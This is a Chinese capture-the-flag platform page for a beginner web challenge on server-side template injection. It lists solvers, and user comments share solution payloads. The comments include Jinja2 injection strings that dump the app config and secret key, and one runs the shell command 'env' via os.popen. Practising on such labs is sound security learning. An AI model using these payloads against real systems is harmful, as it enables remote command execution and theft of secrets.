Simple_SSTI_1WEB 未解决
分数:
5
金币:
2
题目作者:
valecalida
一 血:
dotast
一血奖励:
2金币
解 决:
28981
提 示:
描 述:
Simple_SSTI_1
评分(51)
解题动态
Ray66666666 攻破了该题 1小时前
18599298628 攻破了该题 20小时前
耶无忧 攻破了该题 22小时前
bbbuild 攻破了该题 1天前
TohsakaRin 攻破了该题 1天前
zrlht 攻破了该题 1天前
TryShallow 攻破了该题 1天前
Tiwing 攻破了该题 2天前
lih2004 攻破了该题 2天前
青春小豆 攻破了该题 3天前
kimol 攻破了该题 3天前
MJT 攻破了该题 4天前
xong_bai 攻破了该题 5天前
Star666 攻破了该题 6天前
xiaocj2026 攻破了该题 8天前
我的刀盾 攻破了该题 8天前
starchent 攻破了该题 8天前
bboy01 攻破了该题 8天前
19834403913 攻破了该题 9天前
评论
Terrenc44 10天前
举报
http://160.202.254.160:17484/?flag={{lipsum.__globals__['os'].popen('env').read()}}
icyskin 1月前
举报
http://160.202.254.160:13116/?flag={{config}}
litt 7月前
举报
flag={{config}}都直接爆出flag了
y1 7月前
举报
http://171.80.2.169:15802/?flag={{config.SECRET_KEY}}
xshzgjshpy 8月前
举报
http://171.80.2.169:10541/?flag={{config['SECRET_KEY']}}
cfggfbfxdgbb 9月前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['environ']}}
LeoCHAn 1年前
举报
flag{********}
merrymu 1年前
举报
模板注入(Server-Side Template Injection,SSTI)是一种通过将恶意代码注入服务器端模板来执行非授权操作的安全漏洞,主要成因是开发者未对用户输入进行有效过滤,导致攻击者可利用模板引擎特性实现远程代码执行、敏感信息泄露等高危操作。 基本探测:输入{{2*2}},若返回4则存在漏洞。
HK1ng 1年前
举报
还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}
看writeup刷题 1年前
举报
咋SECRET_KEY还必须大写